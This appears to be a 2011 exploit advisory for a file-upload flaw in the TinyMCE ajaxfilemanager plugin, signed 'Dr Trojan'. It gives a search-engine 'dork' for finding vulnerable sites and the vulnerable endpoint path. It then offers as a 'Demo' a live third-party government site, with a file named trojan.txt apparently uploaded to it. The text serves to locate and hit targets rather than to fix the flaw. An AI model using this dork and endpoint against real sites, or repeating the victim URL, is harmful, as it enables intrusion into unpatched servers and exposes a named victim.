TinyMCE ajaxfilemanager Upload Vulnerability
Web References:-
http://packetstormsecurity.org/files/101793/
TinyMCE-AjaxFileManager-Shell-Upload.html
http://secunia.com/advisories/44760/http://securityreason.com/wlb_show/WLB-2011050108
#########################################################
# Title : TinyMCE ajaxfilemanager Upload Vulnerability
# Author: Dr Trojan
# Greets to all my friends and everyone i know
(www.paksecteam.com)
# Vendor: http://www.phpletter.com/Demo/
Tinymce-Ajax-File-Manager/
# Email : urduhack@gmail.com
# Date : 29/05/2011
# Dork : "tiny_mce/plugins/ajaxfilemanager"
# Category : PHP [File Upload Vulnerability]
# Tested on: [Windows 7, Linux Ubuntu]
#########################################################
Exploit
# http://
[localhost]/[path]/jscripts/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php
# http://
[localhost]/jscripts/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php
# File Extention [.txt],[.jpg],[gif],[bmp]
Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php#
Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt